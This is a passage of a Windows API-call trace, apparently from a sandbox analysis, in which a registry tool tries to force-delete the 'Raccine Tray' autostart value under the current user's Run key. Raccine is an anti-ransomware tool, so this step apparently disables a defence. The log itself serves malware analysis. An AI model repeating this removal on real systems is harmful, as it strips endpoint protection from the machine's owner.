0x49eee8 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4b78 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4b98 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4bb8 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4bd8 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 0x49ef00 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4bf8 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4c18 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4c38 [0081.587] GetProcessHeap () returned 0x490000 [0081.587] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4c70 [0081.587] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.587] GetProcessHeap () returned 0x490000 [0081.588] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 0x49ef18 [0081.588] _memicmp (_Buf1=0x49ef18, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.588] GetProcessHeap () returned 0x490000 [0081.588] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x1e) returned 0x4a3c88 [0081.588] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0081.588] GetProcessHeap () returned 0x490000 [0081.588] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 0x49ef30 [0081.588] _memicmp (_Buf1=0x49ef30, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.588] GetProcessHeap () returned 0x490000 [0081.588] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x6c) returned 0x4a55d8 [0081.588] _vsnwprintf (in: _Buffer=0x4a3c88, _BufferCount=0xe, _Format="|%s|", _ArgList=0x10f8b4 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0081.588] _vsnwprintf (in: _Buffer=0x4a55d8, _BufferCount=0x35, _Format="|%s|", _ArgList=0x10f8b4 | out: _Buffer="|HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0081.588] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0081.588] lstrlenW (lpString="|HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 52 [0081.588] SetLastError (dwErrCode=0x490) [0081.588] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0081.588] GetProcessHeap () returned 0x490000 [0081.588] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x66) returned 0x4a5650 [0081.588] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0081.588] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0081.589] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0081.590] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0081.590] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0081.590] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0081.590] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0081.590] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0081.590] lstrlenW (lpString="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 50 [0081.590] StrChrIW (lpStart="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" [0081.590] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0081.590] GetProcessHeap () returned 0x490000 [0081.590] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x28) returned 0x4a57e8 [0081.590] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0081.590] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.590] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.590] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.590] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Run" [0081.590] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.590] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Run" [0081.591] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.591] StrChrIW (lpStart="Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\CurrentVersion\\Run" [0081.591] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.591] StrChrIW (lpStart="CurrentVersion\\Run", wMatch=0x5c) returned="\\Run" [0081.591] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.591] StrChrIW (lpStart="Run", wMatch=0x5c) returned 0x0 [0081.591] SetLastError (dwErrCode=0x490) [0081.591] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.591] SetLastError (dwErrCode=0x0) [0081.591] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x5c) returned 0x4a5818 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x88) returned 0x4a5880 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a57e8) returned 1 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a57e8) returned 0x28 [0081.591] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a57e8 | out: hHeap=0x490000) returned 1 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5650) returned 1 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5650) returned 0x66 [0081.591] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5650 | out: hHeap=0x490000) returned 1 [0081.591] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/V", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0081.591] lstrlenW (lpString="Raccine Tray") returned 12 [0081.591] GetProcessHeap () returned 0x490000 [0081.591] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x24) returned 0x4a57e8 [0081.592] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0081.592] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0081.592] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/va", cchCount2=-1) returned 1 [0081.592] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0081.592] SetLastError (dwErrCode=0x0) [0081.592] GetProcessHeap () returned 0x490000 [0081.592] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4c90 [0081.592] GetProcessHeap () returned 0x490000 [0081.592] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4cb0 [0081.592] GetProcessHeap () returned 0x490000 [0081.592] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 0x49ef48 [0081.592] _memicmp (_Buf1=0x49ef48, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.592] GetProcessHeap () returned 0x490000 [0081.592] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x200) returned 0x4a5910 [0081.592] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0x4a5910, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0081.592] lstrlenW (lpString="YNA") returned 3 [0081.592] GetProcessHeap () returned 0x490000 [0081.592] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x8) returned 0x4a5490 [0081.592] lstrlenW (lpString="Raccine Tray") returned 12 [0081.592] _memicmp (_Buf1=0x49ef48, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.592] LoadStringW (in: hInstance=0x0, uID=0xcd, lpBuffer=0x4a5910, cchBufferMax=256 | out: lpBuffer="Delete the registry value %s (Yes/No)? ") returned 0x27 [0081.592] lstrlenW (lpString="Delete the registry value %s (Yes/No)? ") returned 39 [0081.592] GetProcessHeap () returned 0x490000 [0081.592] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x50) returned 0x4a5650 [0081.592] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x10f8f8 | out: phkResult=0x10f8f8*=0x70) returned 0x0 [0081.593] GetProcessHeap () returned 0x490000 [0081.593] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 0x49ef60 [0081.593] RegDeleteValueW (hKey=0x70, lpValueName="Raccine Tray") returned 0x2 [0081.593] RegCloseKey (hKey=0x70) returned 0x0 [0081.593] _memicmp (_Buf1=0x49ef48, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.593] LoadStringW (in: hInstance=0x0, uID=0xbf, lpBuffer=0x4a5910, cchBufferMax=256 | out: lpBuffer="The system was unable to find the specified registry key or value.\n") returned 0x43 [0081.593] lstrlenW (lpString="The system was unable to find the specified registry key or value.\n") returned 67 [0081.593] GetProcessHeap () returned 0x490000 [0081.593] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x88) returned 0x4a5b18 [0081.593] GetLastError () returned 0x0 [0081.593] lstrlenW (lpString="The system was unable to find the specified registry key or value.\n") returned 67 [0081.593] GetProcessHeap () returned 0x490000 [0081.593] GetProcessHeap () returned 0x490000 [0081.593] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4ac8) returned 1 [0081.593] GetProcessHeap () returned 0x490000 [0081.593] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4ac8) returned 0x2 [0081.593] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4ac8 | out: hHeap=0x490000) returned 1 [0081.593] GetProcessHeap () returned 0x490000 [0081.593] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x88) returned 0x4a5ba8 [0081.593] SetLastError (dwErrCode=0x0) [0081.593] __iob_func () returned 0x77032900 [0081.594] GetProcessHeap () returned 0x490000 [0081.594] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4cd0 [0081.594] GetProcessHeap () returned 0x490000 [0081.594] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4cf0 [0081.594] GetProcessHeap () returned 0x490000 [0081.594] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x14) returned 0x4a4d10 [0081.594] _memicmp (_Buf1=0x49ef48, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.594] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x4a5910, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0081.594] lstrlenW (lpString="ERROR:") returned 6 [0081.594] GetProcessHeap () returned 0x490000 [0081.594] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0xe) returned 0x49ef78 [0081.594] GetProcessHeap () returned 0x490000 [0081.594] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x10) returned 0x4a5c50 [0081.594] _memicmp (_Buf1=0x4a5c50, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.594] GetProcessHeap () returned 0x490000 [0081.594] RtlAllocateHeap (HeapHandle=0x490000, Flags=0xc, Size=0x1000) returned 0x4a6038 [0081.595] _vsnwprintf (in: _Buffer=0x4a6038, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x10f8c0 | out: _Buffer="ERROR: ") returned 7 [0081.595] _fileno (_File=0x77032940) returned -2 [0081.595] _errno () returned 0x7507d8 [0081.595] _get_osfhandle (_FileHandle=-2) returned 0xffffffff [0081.610] SetLastError (dwErrCode=0x6) [0081.610] lstrlenW (lpString="ERROR: ") returned 7 [0081.610] GetConsoleOutputCP () returned 0x1b5 [0081.610] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ERROR: ", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0081.610] GetConsoleOutputCP () returned 0x1b5 [0081.611] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ERROR: ", cchWideChar=7, lpMultiByteStr=0xf9f360, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR: ", lpUsedDefaultChar=0x0) returned 7 [0081.611] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 7 [0081.611] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned -1 [0081.611] _fileno (_File=0x77032940) returned -2 [0081.611] _errno () returned 0x7507d8 [0081.611] _get_osfhandle (_FileHandle=-2) returned 0xffffffff [0081.611] SetLastError (dwErrCode=0x6) [0081.611] lstrlenW (lpString="The system was unable to find the specified registry key or value.\n") returned 67 [0081.611] GetConsoleOutputCP () returned 0x1b5 [0081.699] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system was unable to find the specified registry key or value.\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0081.699] GetConsoleOutputCP () returned 0x1b5 [0081.699] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system was unable to find the specified registry key or value.\n", cchWideChar=67, lpMultiByteStr=0xf9f360, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system was unable to find the specified registry key or value.\n", lpUsedDefaultChar=0x0) returned 67 [0081.700] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 67 [0081.700] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned -1 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5818) returned 1 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5818) returned 0x5c [0081.700] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5818 | out: hHeap=0x490000) returned 1 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5880) returned 1 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5880) returned 0x88 [0081.700] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5880 | out: hHeap=0x490000) returned 1 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a57e8) returned 1 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a57e8) returned 0x24 [0081.700] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a57e8 | out: hHeap=0x490000) returned 1 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5910) returned 1 [0081.700] GetProcessHeap () returned 0x490000 [0081.700] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5910) returned 0x200 [0081.701] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5910 | out: hHeap=0x490000) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef48) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49ef48) returned 0x10 [0081.701] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef48 | out: hHeap=0x490000) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4cb0) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4cb0) returned 0x14 [0081.701] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4cb0 | out: hHeap=0x490000) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6038) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a6038) returned 0x1000 [0081.701] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a6038 | out: hHeap=0x490000) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5c50) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5c50) returned 0x10 [0081.701] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5c50 | out: hHeap=0x490000) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c90) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4c90) returned 0x14 [0081.701] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c90 | out: hHeap=0x490000) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a55d8) returned 1 [0081.701] GetProcessHeap () returned 0x490000 [0081.701] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a55d8) returned 0x6c [0081.702] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a55d8 | out: hHeap=0x490000) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef30) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49ef30) returned 0x10 [0081.702] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef30 | out: hHeap=0x490000) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c18) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4c18) returned 0x14 [0081.702] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c18 | out: hHeap=0x490000) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a3c88) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a3c88) returned 0x1e [0081.702] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a3c88 | out: hHeap=0x490000) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef18) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49ef18) returned 0x10 [0081.702] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef18 | out: hHeap=0x490000) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4bf8) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4bf8) returned 0x14 [0081.702] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4bf8 | out: hHeap=0x490000) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5ba8) returned 1 [0081.702] GetProcessHeap () returned 0x490000 [0081.702] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5ba8) returned 0x88 [0081.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5ba8 | out: hHeap=0x490000) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4ad8) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4ad8) returned 0x14 [0081.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4ad8 | out: hHeap=0x490000) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5b18) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5b18) returned 0x88 [0081.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5b18 | out: hHeap=0x490000) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4af8) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4af8) returned 0x14 [0081.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4af8 | out: hHeap=0x490000) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5490) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5490) returned 0x8 [0081.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5490 | out: hHeap=0x490000) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] GetProcessHeap () returned 0x490000 